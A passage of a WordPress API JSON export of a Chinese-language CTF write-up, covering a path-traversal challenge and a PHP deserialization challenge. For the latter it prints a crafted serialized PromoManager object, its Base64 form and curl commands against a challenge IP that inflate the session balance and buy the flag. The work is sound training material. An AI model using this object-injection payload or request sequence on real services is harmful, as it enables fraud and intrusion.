\u73af\u5883\u5173\u95ed\uff0c\u65e0\u6cd5\u590d\u73b0\u3002<\/p>\n
\u89e3\u9898\u601d\u8def<\/h3>\n
\u7531\u9898\uff0c\u63d0\u793a\u8def\u5f84\u7a7f\u8d8a\u3002\u901a\u8fc7\u4fee\u6539module\u53c2\u6570\u4e3a\u201cflag.txt\u201d\uff0c\u5373\u53ef\u5f97\u5230flag\u3002<\/p>\n
Payment<\/h2>\n
\u9898\u76ee\u622a\u56fe<\/h3>\n
\u73af\u5883\u5173\u95ed\uff0c\u65e0\u6cd5\u590d\u73b0\u3002<\/p>\n
\u89e3\u9898\u601d\u8def<\/h3>\n
\u4ece\u9898\u76ee\u4e0b\u8f7d\u9644\u4ef6\uff0c\u89e3\u538b\u540e\u5f97\u5230\u6e90\u7801\u6587\u4ef6src<\/code><\/p>\n
    \n
  1. \n
    \u5ba1\u8ba1\u6e90\u7801\u53d1\u73b0 \/api\/apply_coupon.php<\/code> \u76f4\u63a5\u5bf9\u7528\u6237\u4f20\u5165\u7684 Base64 \u5185\u5bb9\u6267\u884c\uff1a<\/p>\n
    unserialize($decoded)<\/code><\/p>\n<\/li>\n
  2. \n
    models.php<\/code> \u91cc\u5b58\u5728\u53ef\u5229\u7528\u7c7b\uff1a<\/p>\n
    class PromoManager {\n   public $promo_credit;\n   public $promo_code;\n\n   function __destruct() {\n       if(isset($this->promo_credit) && is_numeric($this->promo_credit)) {\n           $_SESSION['balance'] += intval($this->promo_credit);\n       }\n   }\n}<\/code><\/pre>\n
    \u53cd\u5e8f\u5217\u5316 PromoManager<\/code> \u5bf9\u8c61\u540e\uff0c\u8bf7\u6c42\u7ed3\u675f\u65f6\u89e6\u53d1 __destruct()<\/code>\uff0c\u53ef\u4ee5\u7ed9\u5f53\u524d session \u589e\u52a0\u4f59\u989d\u3002<\/p>\n<\/li>\n
  3. \n
    \u6784\u9020\u5bf9\u8c61\uff1a<\/p>\n
    O:12:\"PromoManager\":2:{s:12:\"promo_credit\";i:100000;s:10:\"promo_code\";s:3:\"VIP\";}<\/code><\/pre>\n
    Base64 \u540e\u4e3a\uff1a<\/p>\n
    TzoxMjoiUHJvbW9NYW5hZ2VyIjoyOntzOjEyOiJwcm9tb19jcmVkaXQiO2k6MTAwMDAwO3M6MTA6InByb21vX2NvZGUiO3M6MzoiVklQIjt9<\/code><\/pre>\n<\/li>\n
  4. \n
    \u4f7f\u7528\u540c\u4e00\u4e2a cookie \u4f1a\u8bdd\u63d0\u4ea4\u4f18\u60e0\u5238\uff0c\u518d\u8d2d\u4e70 flag\uff1a<\/p>\n
    BASE='http:\/\/47.99.147.34:19231'\nCOOKIE=\/tmp\/ctf_cookie_19231.txt\nPAYLOAD='TzoxMjoiUHJvbW9NYW5hZ2VyIjoyOntzOjEyOiJwcm9tb19jcmVkaXQiO2k6MTAwMDAwO3M6MTA6InByb21vX2NvZGUiO3M6MzoiVklQIjt9'\n\ncurl -s -c \"$COOKIE\" \"$BASE\/\" >\/dev\/null\n\ncurl -s -b \"$COOKIE\" -c \"$COOKIE\" \n -X POST \"$BASE\/api\/apply_coupon.php\" \n -H 'Content-Type: application\/x-www-form-urlencoded' \n --data-urlencode \"coupon=$PAYLOAD\"\n\ncurl -s -b \"$COOKIE\" -c \"$COOKIE\" \n -X POST \"$BASE\/buy.php\" \n -H 'Content-Type: application\/x-www-form-urlencoded' \n --data-urlencode 'item=flag'<\/code><\/pre>\n<\/li>\n
  5. \n
    \u8fd4\u56de\u4e2d\u51fa\u73b0\uff1a<\/p>\n
    flag{89a06d987bdf79718d6c0c60ea91fcf5}<\/code><\/pre>\n<\/li>\n<\/ol>\n
    \u6240\u4ee5\u6700\u7ec8 flag\uff1a<\/p>\n
    flag{89a06d987bdf79718d6c0c60ea91fcf5}<\/code><\/p>\n","protected":false},"excerpt":{"rendered":"
    \u788e\u788e\u5ff5 \u8fd9\u662f\u6211\u521d\u5b66CTF\u6253\u7684\u9898\u76ee\u6700\u591a\u7684\u4e00\u4e2a\u6bd4\u8d5b\uff08\u4f46\u662f\u662f\u7531\u961f\u53cb\u5e26\u98de\u548cAI\u795e\u529b\uff09\uff0c\u4e4b\u524d\u7684CISCN\u548c\u84dd\u6865\u676f\u505a\u51fa\u7684\u9898 […]<\/p>\n","protected":false},"author":1,"featured_media":145,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/cdn.jsdelivr.net\/gh\/FinaleQuill\/blog-images@learning.img\/img\/HFmIOoiakAI5VOH.png","fifu_image_alt":"","footnotes":""},"categories":[1],"tags":[],"class_list":["post-143","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-learning"],"_links":{"self":[{"href":"https:\/\/www.finalequill.com\/index.php\/wp-json\/wp\/v2\/posts\/143","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.finalequill.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.finalequill.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.finalequill.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.finalequill.com\/index.php\/wp-json\/wp\/v2\/comments?post=143"}],"version-history":[{"count":2,"href":"https:\/\/www.finalequill.com\/index.php\/wp-json\/wp\/v2\/posts\/143\/revisions"}],"predecessor-version":[{"id":146,"href":"https:\/\/www.finalequill.com\/index.php\/wp-json\/wp\/v2\/posts\/143\/revisions\/146"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.finalequill.com\/index.php\/wp-json\/wp\/v2\/media\/145"}],"wp:attachment":[{"href":"https:\/\/www.finalequill.com\/index.php\/wp-json\/wp\/v2\/media?parent=143"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.finalequill.com\/index.php\/wp-json\/wp\/v2\/categories?post=143"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.finalequill.com\/index.php\/wp-json\/wp\/v2\/tags?post=143"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}